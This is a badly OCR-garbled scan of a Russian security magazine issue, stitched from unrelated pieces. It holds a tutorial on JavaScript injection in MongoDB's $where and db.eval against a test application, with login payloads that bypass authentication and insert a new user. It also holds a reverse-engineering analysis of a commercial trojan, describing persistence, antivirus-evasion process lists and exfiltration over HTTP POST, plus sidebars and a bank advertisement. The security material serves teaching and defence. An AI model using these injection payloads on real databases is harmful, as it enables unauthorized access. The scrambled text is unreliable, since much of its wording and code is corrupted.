и агрегации СУБД берет на себя, от разработчика требуется лишь 
указатьисходныеданные и функции, реализующие команды тар 
и гебисе. Дополнительная информация доступна в документации 
на МопдойВ ( ЬіЕІу/4Ѵ7тР ). 

В нашем тестовом приложении имеется баѵаБсгірІ-инъекция в опе- 
раторе $ѵѵЬеге и аналогичная уязвимость в команде бЬ.еѵаІ. 

Начнем с оператора $ѵѵЬеге. Открой приложение и выбери пункт 
$ѵѵЬеге в меню «Инъекции баѵаБсгірІ». Аутентификация на страни- 
це реализована в методе ззіі-ѵѵЬеге класса МопдоОЬСопІгоІІег: 

ѵаг из = "-Еіііб . 1о§іп === ' " + 1о§іп + 

" '&& "Ыііз . раззыогб === ' " + раззыогб + " ' " ; 
ѵаг Іо&іпРагат = { 'выбеге" : дз }; 

Сначала генерируется скрипт, который проверяет имя и па- 



РАО ПО N0501 



КАКОВО ПРОИСХОЖДЕНИЕ ТЕРМИНА 
N0501? 



* N0501. переводится не как «Нет БОБ» 

” (N 0 БОБ а* аІІ), а как «Не только БОБ» 

(N 0 * опіу БОБ). Этот термин возник в 1998 
году: именно так Карло Строцци (Сагіо 
5ІГ022І) назвал свою нереляционную 
систему управления базами данных. 

Второе рождение он получил в 2009-м, 
когда Эрик Эванс (Егіс Еѵапз) на конферен- 
ции, посвященной свободным распреде- 
ленным базам данных, использовал его для 
обозначения нереляционных СУБД и храни- 
лищ данных. 

Можно считать, что именно эта кон- 
ференция положила начало буму ІЧоБОБ- 
решений. 



ЧТО ТАКОЕ МОЫбООВ? 

МопдойВ — это документо- 
ориентированная система управления 
базами данных с открытым исходным кодом, 
разрабатываемая компанией Юдеп с октября 
2007 года. Первый релиз МопдойВ вышел 
в феврале 2009 года. СУБД позиционируется 
как решение для хранения данных в высоко- 
нагруженных проектах. К ее основным 
достоинствам можно отнести высокую 
производительность, отличную масштабируе- 
мость, отказоустойчивость и наличие 
обширного сообщества разработчиков 
и пользователей. На данный момент среди 
пользователей МопдойВ присутствуюттакие 
всемирно известные компании, как Різпеу, 
БАР, РогЬез и другие. 




ПОЧЕМУ N0501.? 



Давай рассмотрим, какие основные 
преимущества имеют базы данных 
ІЧоБОБ по сравнению со своими реляционны- 
ми собратьями. 

1. Производительность. 

Разработчики большинства МоБОБ- 
решений посвящают очень много времени 
оптимизации своих проектов. МопдойВ 
позволяет добиться порядка 20000 вставок 
и 4800 выборок в секунду. 

Простая настройка репликации баз данных. 
МопдойВ позволяет настроить репликацию 
всего л ишь с помощью нескольких команд, 
то есть гораздо проще, чем в том же Огасіе. 
Множество «плюшек», облегчающих 
жизнь программистам. 



2 . 



3 . 
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Успешная аутентификация в тестовом приложении 

роль пользователя. К сожалению, данные в переменных развѵѵогсі 
и Іодіп никак не проверяются, что позволяет выполнить любой 
скрипт на сервере. 

Теперь давай попробуем войти какгооБ Введи имя пользова- 
теля «гоо’Е' //» и попробуй войти. Ты в очередной раз успешно 
залогинишься! Это возможно благодаря тому, что на сервере был 
сформирован следующий запрос к МопдоБВ: 

Т_ ' $мІпеге ' : 

'1:ІіІ5.1о§іп === ѴгооІі Ѵ /Л ' && іііііз . раззыогсі === \ \ ' } 

«//» — это комментарий в ЭаѵаБсгірБ поэтому результирующий 
запрос примет вид «‘Ыііб.іо^іп === 'гоо^'». 

К счастью, в момент выполнения запроса база данных находится 
в режиме «Только чтение», поэтому злоумышленник не сможет напи- 
сать скрипт, модифицирующий твои данные. Но это еще не говорит 
о том, что подобная атака невозможна. Открой страницу «Инъекции 
ЭаѵаБсгірІ — бЬ.еѵаК...)». На этот раз аутентификация происходит 
посредством вызова функции еѵаі на сервере базы данных: 

ѵаг 15 ^У'-РипсТіоп () { геТигп сІЬ.иБегз.бпсІОпе (^1о§іп: ' " 
+ 1о§іп + " ' , ра55могс1 : ' " + раззыопсі + " ' }); }" 
сИэ.еѵаЦдз); 

Как видишь, у тебя есть возможность выполнить любой код 
на сервере БД. Попробуй создать нового пользователя реп_1ез1 
с паролем реп_1евТ Для этого нужно ввести следующий логин: 

сІЬ.и5ег5.іп5ег1= ({1о^іп: ' реп_1=е5І= ' . раззыогсі : 

' реп_1:е5І: ' }) ^ 1 } 

Во-первых, ты вошел в систему. Во-вторых, в базе данных 
появился новый пользователь реп_1ез1 :). 




Ншриилъин имя інлиФстлі нл» пароль №пнт«№і іун раз. 
ВуДіи нд р+пеим. 



Доступ ктестовому приложениюзапрещен 

Серверный ЭаѵаБсгірІ обладает огромным потенциалом и в то 
же время несет в себе много опасностей. Одна маленькая ошибка 
в коде, и злоумышленник получает доступ ктвоему серверу баз 
данных. Я настоятельно рекомендую не использовать серверные 
скрипты: 85 % запросов можно написать и без них. 

ЗАКЛЮЧЕНИЕ 

В заключение я бы хотел поговорить о том, каким я вижу настоя- 
щее и будущее ІМоБСіБ-сообщества. Во-первых, ты убедился в том, 
что І\ІоБС1Б-СУБД пока не являются мейнстримом, но уже довольно 
близки к этому: появляются новые нереляционные СУБД и проекты, 
которые их используют. Как мне кажется, в ближайшем будущем 
ІМоБСіБ-решения займут относительно большую долю на рынке высо- 
конагруженных приложений. Во-вторых, безопасность современных 
1\1о5С1Б-СУБД оставляет желать лучшего. Если в мире реляционных 
баз данных существует один стандартизированный языкзапросов 
— БОБ, то в «нереляционном мире» каждый реализует язык запро- 
сов, как ему вздумается: Э50ІМ, ХОиегу, ПЕБТ-интерфейсы. Соответ- 
ственно, и потенциальныхуязвимостей намного больше. Если при 
работе с реляционными базами данных было достаточно изучить 
5(ЭБ-инъекции и способы борьбы с ними (при этом ты мог применить 
уже имеющиеся знания как в МуБОБ, так и в Огасіе или 50Б Бегѵег), 
то с нереляционными базами данных всё не так просто. Сначала 
тебе предстоит разобраться, какой язык запросов используется 
в твоей СУБД, как осуществляется доступ к данным и существуют 
ли дополнительные возможности, которые можно использовать для 
взлома (например, серверный ЭаѵаБсгірІ в МопдоБВ). После сбора 
информации тебе предстоит найти потенциальные уязвимости 
в своей системе и способы их устранения. 

Я очень надеюсь, что в ближайшем будущем ситуация изменится: 
в открытом доступе появится больше информации и защититься 
отугроз, связанных с использованием ЫоБОБ-СУБД, будеттакже про- 
сто, как от обычных БОБ-инъекций. ЛО 



Например, МопдойВ имеет встроенную 
поддержку Мар/Весіисе и сложных структур 
данных. 

4. Масштабируемость. 

Это один из главных козырей ІЧоБСІБ-СУБД. 
Большинство из них поддерживает горизон- 
тальное масштабирование, что способствует 
существенной экономии средств на обору- 
довании, ведь дешевле купить еще один не- 
дорогой сервер для кластера, чем добавить 
в корпоративный сервер дополнительную 
пару процессоров и оперативную память. 

5. Онидешевле! 

Большинство ІМоБОБ-решений — это 
проекты с открытым исходным кодом. Ты 
можешь скачать их прямо сейчас и начать 
использовать. Вокруг многих проектов 
сформировалось большое и сплоченное 



сообщество, которое всегда готово помочь 
и исправить найденный тобой баг. В конце 
концов, ты сам можешь исправить баг 
или написать необходимое расширение. 
Кроме того, можно заметно сэкономить 
на расходахнаадминистраторовбаз 
данных, так как нереляционные СУБД 
гораздо проще реляционных и для их 
поддержки вбольшинствеслучаев 
нетребуется специальный сотрудник. 

КТО ИСПОЛЬЗУЕТ N0501.? 

Как видишь, ІМоБОБ-СУБД имеют ряд 
неопровержимых преимуществ. Давай 
рассмотрим, кто же их использует: 

• «Облачные» сервисы, а именно боодіе, 
Атаюп и дажеѴѴіпсіоѵѵзАіигеотМісгозоН. 



□ 

А 



Порталы и социальные сети: РасеЬоок, 
Тѵѵіиег, Біпкесііп — думаю, ты сможешьпро- 
должить список самостоятельно. 

БааБ. Всё большее число компаний выбира- 
ет решения БоНѵѵаге-аз-Бегѵісе в качестве 
основной платформы для ведения бизнеса 
в тех отраслях, где постоянно растут на- 
грузки на инфраструктуру. Многие постав- 
щики БааБ- решений переходят на ІМоБСІБ. 
Так, кпримеру, поступил Баіез^огсе. сот — 
лидер в области БааБ СВМ. 

Стартапы. Это отдельная категория проектов, 
которыезапускаются с минимальным бюдже- 
том с расчетом на суперприбыли в будущем. 
ТакиепроектычастовыбираютІМоБСІБ- 
решения, так какони, во-первых, дешевы, 
а во-вторых, представляютсобой отличный 
задел на будущее, если он будетпопулярным. 
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.ЛоЬппу СаІсЬ 




Легальный 

троян: это как? 



На нашем дискеты 
найдешь видео, в 
котором наглядно 
показан процесс 
обнаружения трояна 
РС5 в системе 



ПОТРОШИМ 
КОММЕРЧЕСКИЙ 
ЗЛОВРЕД НЕМОТЕ 
СОЫТКОІ. 5Ѵ5ТЕМ 

В ІТ-сообществе принято считать 
безусловным злом любой софт, 
который крадет персональные данные 
пользователя и приносит огромную прибыль 
киберпреступникам. Между тем существуют 
вполне легальные компании, которые 
разрабатывают и продают трояны. 



НЕЛЕГАЛЬНОЕ ЛЕГАЛЬНО 



Неужели действительно кто-то разрабатывает и продает вредо- 
носное ПО легально? Да, только тот же самый софт, за создание 
которого еще вчера могли привлечь к ответственности, разраба- 
тывается не со злым умыслом, а для решения вполне легитим- 
ных задач. Скажем, спецслужбы могут осуществлять с помощью 
программ, которые совсем недавно использовались кактрояны, 
сбор оперативной информации — где тут вредоносность? Восьмого 
октября 2011 года крупнейший европейский хакерский клуб СЬаоз 
Сотриіег СІиЬ (ССС) опубликовал отчет о реверс-инжиниринге 
трояна, который немецкая полиция якобы использовала не только 
для сбора пользовательских данных, но и для скрытой установки 
программного обеспечения на зараженные компьютеры. Власти 
официально этот факт подтвердили. А в декабре исследователь и 
завсегдатай форума ХйА-сІеѵеІорегз Тревор Экхарт обнаружил, что 
ряд современных смартфонов, в том числе АпсІгоісІ и іРбопе, скрыто 
следят за действиями пользователей и передают собранную 
«статистику» производителям. Подробнее об этих двух инцидентах 
можешь прочитать во врезке. Сейчас же я предлагаю рассмотреть 
один из таких «легальных троянов» — Ретоіе Сопігоі Вузіет, 
узнать, что о нем говорят разработчики, и разобраться, что он на 
самом деле собой представляет. 



РЕМОТЕ СОІ\ІТРОІ_ 5У5ТЕМ 



Скажу прямо, сам производитель предоставляет о программе 
крайне скудную информацию. На официальном сайте итальянской 
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Легальный троян: это как? 
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Реквизиты стороны, подписавшей х64-драйвер 

компании НаскіпдТеат ( ) можно найти всего 

лишь несколько презентаций и два видеоролика. Однако этого 
вполне достаточно для понимания того, что возможности РС5 
просто огромны. Программа позволяет собирать информацию об 
операционной системе, нажатиях клавиш, автоматически делает 
скриншоты экрана, окон и областей, в которых пользователь 
кликнул мышкой. Вдобавок программа умеет перехватывать пере- 
писку в чатах, а также разговоры в Зкуре, боодіе Таік и других ІМ. 
Если у зараженного пользователя подключена веб-камера, троян 
может делать с ее помощью фотографии и передавать их на сервер 
атакующего. Более того, в РС5 имеется специальный модуль, 
который постоянно сканирует файловую систему зараженного 
компьютера, а затем передает на сервер файлы с определенными 
расширениями. Существуют версии зловреда для ѴѴіпсІоѵѵз, Мае и 
ряда мобильных платформ, среди которых следует особо выделить 
іРЬопе и АпбгоісІ. Производитель заверяет, что РСБ совершенно не 
видна в зараженной системе и антивирусы с файерволами ей тоже 



САРРІЕР Ю: ЛЕГАЛЬНЫЙ ТРОЯН 
В СМАРТФОНАХ 



Копаясь в прошивке Апсігоісі-смартфонов фирмы НТС, Тревор 
Экхарт обнаружил программу, работающую в скрытом режиме 
и собирающую информацию о нажатиях клавиш на диалере 
или клавиатуре, просмотре рекламных объявлений, получении 
СМС, включении и отключении экрана, получении звонков, 
местоположении и т. д. Дальнейшие исследования показали, 
что эта программа является детищем фирмы Саггіег Ю, которая 
активно сотрудничает с производителями как смартфонов, так 
и простых мобильныхтелефонов. Производитель оборудования 
получает исходники программы от СЮ, дорабатывает их и 
внедряет в прошивку устройства. Крометого, СЮ предоставляет 
удобный интерфейс для работы с полученными данными. 

Элементы кода программы были найдены в прошивках с Бепзе 
III, а также на аппаратах производства Баплзипд с интерфейсом 
ТоисЬ ѴѴІ2. В результате проделанной работы Тревор написал 
программу, которая позволяет проверить телефон на наличие 
этого руткита и, если в смартфоне есть права гооі, попытаться 
удалить руткит (подробнее читай на Іѵ/зсІкКсЕ ). 
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Восстановленная функция выработки ключа Апсігоісі-версии малвари 

не помеха. И это действительно так: при работе на зараженной 
машине троян не вызывает подозрений у «Антивируса Касперско- 
го» со стандартными настройками, файервол 4опе АІагт спокойно 
пропускаеттрафик, а РооІкііРеѵеаІег Руссиновича не показывает 
ничего подозрительного. Один лишь ѴѴігезЬагк, установленный на 
компьютере-маршрутизаторе, фиксирует некоторое количество 
НТТР-Р05Т-запросов к одному из серверов в интернете. 

ОБНАРУЖЕНИЕ 

Как оказалось, обнаружить троян довольно легко, достаточно 
лишь загрузиться с загрузочной флешки и прошерстить винчестер 
зараженного компьютера. РС5 создает директорию либо в корне 
диска С, либо в %АРР0АТА%, а также генерирует ключ реестра со 
случайным именем в разделе Рііп, причем при работе зараженной 
системы директория и ключ не видны для файл-менеджеров и ре- 
дакторов реестра. Чуть позже я расскажу, почему, а пока останов- 
люсь на компонентах трояна. 

Модная нынче тенденция реализовывать малварь не в виде ехе, 
а в виде библиотеки сІІІ не обошла стороной и разработчиков РС5. 
Вообще, версия этого трояна для ѴѴіпсІоѵѵз включает в себя следую- 
щие компоненты (имена модулей могут отличаться в зависимости 
от версии/хозяина): 

1. Основной модуль7К0тРРРз.ТРК(0Ы,х86). 

2. Файл конфигурации аб^бббГОиб. 

3. Кодекдля кодирования речи СгТЬВВВТ.7аг ЮЫ, х86]. 

4. Дополнительныйх64-модульІтз5ддд8.Т4і ШИ, х64). 

5. Драйвер х640СІ : кѵѵѵѵѵ.Н Ю (5Ѵ5, х64). 

6 . Драйвер х86 УОхоЬЬЬп.рУЗ (5Ѵ5, х86). 

Любой здравомыслящий человек сразу задаст вопрос о скрытой 
установке х64-драйвера в систему. Здесь нет ничего необычного, 
разработчики пошли по пути наименьшего сопротивления и просто 
подписали его своей электронной подписью. К слову сказать, это 
их и палит (смотри первую иллюстрацию], так как Гугл моменталь- 
но наводит нас на сайт производителя трояна. 

ГДЕ СОБАКА ЗАРЫТА? 

Сразу скажу, что я коснусь в основном только х86-версии РС5. 

Как уже отмечалось ранее, основной модуль представляет собой 
динамическую библиотеку для архитектуры х86. ОІІ экспортирует 
восемь функций с ничем не примечательными именами: НРР1, 

РІРР2, ..., Н РР8. Значение ключа реестра в разделе Рип, запускаю- 
щее троян, имеет следующий вид: 

гипсІ1132 . ехе " с : \-Ьг5МККК0\7КОтРРРз . ТКК" , НРР8 
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— и намекает на то, что в первую очередь необходимо изучить 
восьмую функцию НРР8. Вообще, закидывая сІІІ в ЮА, я думал, что 
нарвусь на какой-нибудь пакер или навороченную защиту, но и с 
этим разработчики не стали заморачиваться — антиотладочных 
средств я не обнаружил, программа имела только защиту против 
статического анализа кода, которая скорее направлена против 
антивирусов, нежели реверсера. Поэтому разбирать по косточкам 
эту малварь было легко, удобно и интересно. 

ЗАПУСК 

Работу функции НРР8 можно логически разделить на несколько 
блоков. Первый — проверка основных модулей трояна: сначала 
он проверяет, является ли гипсІІІ32.ехе текущим процессом, далее 
перебирает все сІІІ, подгруженные в адресное пространство, затем 
пытается получить в каждом из них адрес функции НРР1 и срав- 
нивает полученный адрес с уже имеющимся значением. Далее при 
помощи функции ЗеіМосІііІеРіІеМатеЕхѴѴ троян получает имя своей 
главной сІІІ (с путем), преобразует его в А5СІІ и оставляет только 
имя файла. Путь к файлу и имя файла сохраняются в двух разных 
буферах в збагесі-сегменте, где выделена память для данных, 
доступ к которым нужен другим процессам, в чье адресное про- 
странство также подгружена сІІІ строчном. Затем каждый символ 
полученного имени заменяется на другой в соответствии с не- 
которой таблицей, а новое имя файла (если все предыдущие шаги 
завершились успешно) копируется в збагесі -сегмент как имя файла 
с настройками. Каждый символ имени файла с настройками также 
кодируется при помощи некой таблицы для преобразования в имя 
еще одной части трояна. Таким образом и создаются все необходи- 
мые имена файлов, которые записываются в збагесі-сегмент дина- 
мической библиотеки. После имен файлов в разделяемый сегмент 
копируются имена объектов РіІеМарріпд. Всего таких объектов три, 
и их названия имеют префиксы КМ51, КМ52, КМ53. После каждого 
префикса идет еще восемь Ьех-значений. Троян считает провер- 
кууспешной, если найден основной модуль. Наличие остальных 
модулей на данном этапе не проверяется. 



Р202 



Осенью крупнейший европейский хакерский клуб СЬаоз 
Сотриіег СІиЬ (ССС) опубликовал отчет о «полицейском трое», 
который, как потом признали власти, действительно применялся 
силовыми ведомствами для сбора пользовательских данных. 
Из-за того что в основном модуле трояна имеется строка СЗРО- 
г2сі2-РОЕ, ему присвоили имя Н202. Малварь состоит из ОН с 
именем т{с42иЫІІ и драйвера ѵѵіп5уз32.5у5 для архитектуры х86. 
При заражении РИ прописывается в ветку реестра 50РТѴѴАВЕ\ 
Місго5оН\ѴѴіпс1оѵѵ5 МТ\Сиггеп*Ѵег5Іоп\ѴѴіпс1оѵѵ5\АррІпі*_0І_І_5 и, 
следовательно, подгружается в адресное пространство каждого 
6111-приложения. Малварь скрыто делает скриншоты экрана, 
перехватывает нажатия клавиш клавиатуры, записывает звонки, 
совершаемые при помощи Бкуре, и передает всю эту информацию 
на удаленный сервер. Отмечу, что здесь механизм перехвата 
звонков такой же, как и в РС5. Самый главный фейл, который 
допустили разработчики, — это использование во всех версиях 
малвари фиксированных ключей шифрования и алгоритма 
АЕ5 в режиме ЕСВ при полном отсутствии аутентификации, 
что позволяет практически любому пользователю интернета 
управлять зараженной машиной. 

Исследователи из ССС зареверсили протокол взаимодействия 
немецкой малвари с командным сервером и разработали 
альтернативную программу управления. Члены клуба ССС также 
обнаружили еще одну версию трояна, о чем сообщает одна из 
последнихзаметок на их официальной странице ѵѵѵѵѵѵ.ссс.сіе . 
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Внутренним накопитель 



Малварь в диспетчере приложений АпсІгоісІ 



Второй блок — активация системы маскировки трояна. На этом 
этапе инициализации троян сначала пытается открыть устройство 
МБН40ЕѴ1, которое создается х86-драйвером (номер 6 в списке 
файлов). Если все проходит успешно, то ЬапсІІе устройства сохра- 
няется. Далее выполняется поиск антивирусного ПО, установлен- 
ного на зараженной машине. Для поиска троян всегда использует 
один алгоритм: перебирает загруженные в систему драйвера и 
ищет нужный по определенному имени. Список распознаваемых 
антивирусов довольно внушителен: Аѵіга, Аѵазі, Еуее, РгосбиагсІ, 
МсАіюе, Кегіо, Сотосіо, Рапсіа, ТгепсІМісго, АзЬатроо, Казрегзку, 
АѴ6, ВіЮеІюпсІег и еще пара-тройка экзотических для наших широт 
продуктов. Учитывая особенности каждого антивируса, троян пы- 
тается установить в систему драйвер УОхоЬЬЬп.рУЗ (если он до сих 
пор не установлен), который копируется в системную директорию 
ѴѴіпсІоѵѵз и переименовывается в псіізк.зуз. Установка выполняется 
при помощи функций АОѴАРІ32 типа СгеаІеЗегѵісе, ЗіагіЗегѵісе и 
т. д. Затем троян пытается открыть устройство М5Н40ЕѴ1 и найти 
загруженный драйвер псіізк.зуз. Отмечу, что драйвер устанавли- 
вается только в том случае, если на компьютере имеется любая 
антивирусная программа. 

Третий блок — подготовка к шифрованию данных. Для шифро- 
вания данных используется алгоритм АЕ5 в режиме СВС с длиной 
блока и ключа по 128 бит. Вектор инициализации всегда нулевой, а 
сами ключи хранятся в открытом виде в сегменте данных. На этом 
этапе для каждого ключа выполняется процедура КеуЕхрапзіоп, в 
ходе которой генерируются раундовые ключи. Результаты ее рабо- 
ты для каждого ключа помещаются в збагесі-сегмент. Такой подход 
значительно сокращает время, затрачиваемое на шифрование, 
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так как он устраняет необходимость каждый раз разворачивать 
128-битный ключ в набор раундовых ключей. 

В четвертом блоке инициализируются агенты-процедуры 
сбора пользовательских данных. В процессе инициализации 
заполняется массив пар ключ-значение, где ключом является 
идентификатор агента, а значением — структура с указателями на 
функции первоначальной инициализации, функцию, код которой 
будет выполняться в другом процессе, и процедуру обработки по- 
лученных пользовательских данных. При этом для каждого агента 
также вызывается функция первоначальной инициализации. В 
ходе инициализации агентов дешифруется файл с настройками и 
инициализируются только те сборщики данных, которые указаны 
в конфиге. 

В пятом блоке запускаются удаленные потоки, собирающие 
пользовательские данные. В запуске принимают участие другие 
экспортируемые функции: НРР1, НРР2, НРРЗ. После создаются 
локальные потоки, которые получают собранные пользователь- 
ские данные и обрабатывают их. На этом процедура начальной 
инициализации завершается, и указанный инициализационный 
поток погружается в бесконечный цикл (\л/ЫІе(іше){ 51еер(1000); }). 

В ходе инициализации троян также проверяет, не заражена 
ли уже система. Алгоритм проверки на заражение достаточно 
прост: троян ищет объекты РМеМа рріпд с определенными именами 
(КМ51..., КМ52..., КМ53...), и если находит, то система считается 
зараженной и процесс инициализации прекращается. 

Следует сказать несколько слов и о вызове системных функций. 



АЫОРОЮ-ВЕРСИЯ РС5 



АпсІгоісІ-версия описываемого трояна представляет собой 
обыкновенный арк-файл, который при установке запрашивает 
максимальное количество разрешений, что вполне может 
насторожить даже самых неопытных пользователей. Мне не 
удалось полностью декомпилировать арк в Эаѵа-сценарий при 
помощи АркМападег, так как код трояна слегка обфусцирован. 
Однако большая его часть вполне успешно восстанавливается, 
правда, без имен классов, переменных и т. д. АркМападег 
оставляет в виде опкодов невосстановленные участки кода 
и оборачивает их в комментарии, что позволяет почерпнуть 
дополнительную информацию о трояне. При разархивировании 
арк-файла сразу бросается в глаза, что в этой версии используется 
паііѵе-библиотека (зо), а также имеется зашифрованный файл с 
ресурсами. Оказывается, этот файл также шифруется по алгоритму 
АЕ5 в режиме СВС. При этом последний блок дополняется по 
схеме РКС5#5 и, как и прежде, используется нулевой вектор 
инициализации. В данном случае ключ хранится не в открытом 
виде, а вырабатывается из фиксированной строки при помощи 
многократного вычисления хеш-функции. В расшифрованном 
файле с ресурсами находится множество строковых пар ключ- 
значение, позволяющих получить информацию об используемых 
криптографических алгоритмах. 

Дальнейший анализ показал, что при запуске троян пытается 
проэксплуатировать какую-нибудь уязвимость в Апсігоісі и 
получить права гооі (на моем кастомном билде ему это сделать 
не удалось). ВС5 также собирает пользовательские данные (5М5, 
ММ5, контакты) и информацию о сети сотовой связи, периодически 
включает микрофон телефона и записывает разговоры вокруг 
и передает всё это добро на удаленный сервер. В диспетчере 
приложений малварь пытается замаскироваться под сот. апсігоісі. 
зегѵісе, а при работе ест много памяти и сильно расходует батарею. 
Вообще, здесь следует отдать должное производителям йг.ѴѴеЬ 
І_ідМ — антивируса для Апсігоісі, так как он спокойно палит этот 
троян и выдает пользователю соответствующее предупреждение. 



Все функции ѴѴіпАРІ вызываются по адресам, которые выдает 
(ЗеіРгосАсІсІгезз. Имена всех вызываемых функций зашифрованы 
шифром простой замены. Эти имена хранятся в сегменте данных и 
расшифровываются каждый раз непосредственно перед исполь- 
зованием. 

Версия трояна для 64-битных систем в принципе ничем не 
отличается от версии под х86. В ней используется тот же самый 
основной модуль, однако после запуска троян проверяет, не явля- 
ется ли система 64-битной, и если является, то в игру вступают сІІІ и 
драйвер, написанные специально под х64. 

РАБОТА АГЕНТА 

В большинстве случаев код, внедренный в удаленный процесс, де- 
лает одно и то же: подгружает в адресное пространство своего про- 
цесса сІІІ основного модуля. После этого открываются РіІеМарріпд'и 
(функция НРР4), а на определенные функции устанавливаются хуки 
(функция НРРЗ). По завершении этих процедур сІІІ выгружается из 
адресного пространства процесса, а поток впадает в бесконечный 
цикл (засыпает на одну секунду, просыпается и засыпает вновь). 

При установке хуков проверяется имя текущего процесса. Если 
оно не попадает в определенный список, то устанавливаются толь- 
ко те хуки, которые направлены на маскировку трояна в системе. 

Вообще, этот зловред распознает следующие процессы: 

рсііз* . ехе 

к7* . ехе 

аѵк. ехе 

асітіп.ехе 

Ь§зсап .ехе 

аѵр. ехе 

раѵагк.ехе 

гки* .ехе 

зѵѵ. ехе 

ІсеБыогсІ . ехе 

ріег . ехе 

аѵ§зсапх.ехе 

Кооѣкі-СКеѵеаІег . ехе 

аѵзсап.ехе 

аѵ§агк1:.ехе 

заг§иі.ехе 

ипсгаскте.ехе 

Ііісісіепбпс іе г .ехе 

басктоп.ехе 

ТазкМап.ехе 

ои1:1оок.ехе 

зкурерт.ехе 

зкуре.ехе 

сНготе.ехе 

бге-Рох.ехе 



Распознавание процессов осуществляется только по именам, 
поэтому, переименовав РооІкііРеѵеаІег.ехе в оіоіо.ехе, мы сможем 
легко обнаружить троян. :-) 



ДЛЯ ПОИСКА АНТИВИРУСОВ 
ТРОЯН ВСЕГДА ИСПОЛЬЗУЕТ 
ОДИН АЛГОРИТМ: ПЕРЕБИРАЕТ 
ЗАГРУЖЕННЫЕ В СИСТЕМУ 
ДРАЙВЕРА И ИЩЕТ НУЖНЫЙ 
ПО ОПРЕДЕЛЕННОМУ ИМЕНИ 



ХАКЕР 02/157/2012 



067 



взлом 



ММІІОГ 

а імііМ Инидом) 

іагае 



Л 





— 


[-7; 


* - _і г 




і ■ .і ■ 




* ’ 


Г- 




К 


ѵѴѵ 











\ ■ 



Г 1 



Кеітюіе СопігоЕ 5уЯет сап топііос 

йот а Геѵѵ апсі ир Ій ЬипгігесІіоГ 
:Ьо издпсЬ о! іагдекЛіе ѵиЬоІе 
ьуііет сап Ье тападесі Ьу а ііпдіе 
«а$у (о иае іпІегГасе іЬа! ъітрІіЯеь 
гіау Ьу (іау іпѵеаіідаіюп зеІІѴШеі 




Рекламная брошюра КС5 



Процессы взаимодействуют друг с другом посредством от- 
крытых файл-маппингов. На адресное пространство процесса 
маппится не какой-то определенный файл, а участок свопа. 
Маппингс префиксом имени КМ51 имеет маленький размер (по- 
рядка 20 Кб) и служит для управления агентами. Каждый агент 
периодически заглядывает в йѴѴОРО по адресу «начало_маппин- 
га» + «идентификатор_агента» и считывает оттуда определенную 
команду основного модуля. Второй маппинг служит для передачи 
основному модулю собранных данных и имеет размер порядка 300 
Кб. Данные в виде картинки переводятся в формат ЗРЕВ, голосо- 
вые данные кодируются кодеком зреех (СгТЬВВВТ.7аг). Обработан- 
ная информация шифруется с помощью алгоритма АЕ5 в режиме 
СВС (с нулевым вектором инициализации), сохраняется в текущей 
директории и удаляется после передачи на сервер. Имена сохра- 
няемых в директории файлов представляют собой зашифрован- 
ную простой заменой строку вида І_ОВ_ХХХХ_УѴѴѴѴѴѴѴѴ.Іод, где 
ХХХХ — идентификатор агента, а У.. .У — случайные числа. Данные 
передаются по протоколу НТТР в теле Р05Т-запроса. Какая-либо 
аутентификация как на сервере, так и на клиенте отсутствует, 
поэтому, зареверсив этот простенький алгоритм передачи, можно 
здорово заспамить удаленный сервер и попытаться угнать его 
клиенты. :-) 




Отчет йг.ѴѴеЬ ЫдМ об обнаруженных вирусах 



Отдельный агент, постоянно сканирующий файловую систему 
компьютера, подготавливает для передачи файлы с определен- 
ными расширениями. Следует упомянуть и еще об одном потоке, 
который постоянно сканирует список текущих процессов, чтобы 
заражать новые процессы. Троян запускает новые процессы на 
компьютере от имени ехріогег.ехе за счет инжекции кода в Экспло- 
рер. Зловред использует крайне забавный способ для мониторинга 
активности Рігеіюх: загружает из интернета библиотеки пгіогсгШ. 
сІІІ, БОЙокпЗ.сІІІ и тогздІіІеЗ.сІІІ, которые просто посылают запросы 
к 5СИ_іІе-базам браузера. Подобным образом троян работает и с 
некоторыми другими программами. 

РЕАКЦИЯ АНТИВИРУСА 

В качестве эксперимента я установил «Антивирус Касперского» 
и настроил его на максимальное информирование. При загрузке 
системы АВ выдает сообщение о запуске сІІІ как приложения и 
попытке получения доступа к защищенному хранилищу паролей. 

В этом сообщении, прямо скажем, нет ничего информативного, что 
раскрывало бы суть вирусной активности на компьютере (если бы я 
был обыкновенным пользователем, то, наверное, вообще никак на 
него не прореагировал). При этом журнал антивируса начинает пе- 
стреть сообщениями о разрешенном внедрении кода в сторонний 
процесс, о разрешенном доступе к хранилищу паролей и так далее. 
В общем, никакой пользы для конечного пользователя нет. Един- 
ственный положительный момент состоит в том, что «Касперский» 
видит папку с трояном, однако она не вызываету него никаких 
подозрений, то есть заметить ее довольно сложно. 

51ІММАРѴ 

Вообще, видео на сайте производителя испугало меня больше, чем 
сам троян. Его несложно обнаружить и нейтрализовать, к тому же 
после знакомства с современными средствами создания ботне- 
тов от расковырянной коммерческой малвари остаются весьма 
противоречивые впечатления. Версия для АпсІгоісІ вообще не 
выдерживает критики — она может испортить жизнь только тем 
пользователям, которые вообще не следятза своим смартфоном, 
устанавливают приложения из неизвестных источников и безраз- 
лично относятся к количеству подтверждений, запрашиваемых 
приложениями. На примере этого трояна хорошо видно, что техно- 
логии коммерсантов отстают оттехнологий их криминальных кол- 
лег — создателей 2еиз, Ю55, ЗруЕуе и других подобных вещей. ПЕ 
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ПРЕДЛОЖЕНИЕ МЕСЯЦА 

ДЛЯ ДЕРЖАТЕЛЕЙ 

«МУЖСКОЙ КАРТЪ 



15 парфюмов 

ГПІІІІОП» 

ОТ РАСО КАВАШЕ 




подробности на сайт е МАЛМ.ІТіаПСаГСІГи 



Оформить дебетовую или кредитную * Мужскую карту» 
можно на сайте ѵѵѵтаІГаЬапк.ги или позвонив 
по телефонам: 

(495) 229-2222 ѳ Москве 

8 800-333-2 333 в регионах России (звонок бесплатный) 



МАХІМ 



А Альфа-Банк 



(дате)іаші 




ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 
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СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

МісНаеІ Непсігіскх 

цт.: 

тісНаеІНепсІпскх. 

сот/ІіІІіІі 

Система: 

*піх/ѵѵіп 






Автор: 

йаѵісі Роок 

цкі.: 

адпіііоіооі.зоигсе- 

{огде.пеі 

Система: 

ѴѴіпсІоѵѵз 




ДЕВУШКА ПО ИМЕНИ ШТН 



ЫЫѣИ — это перловый сканер и инжектор 
НТТР-форм. Тулза анализирует веб-страницу 
на наличие тегов <{огт>, а затем тестит 
их на 5СП_-инъекции. ЫЫіМ работает почти 
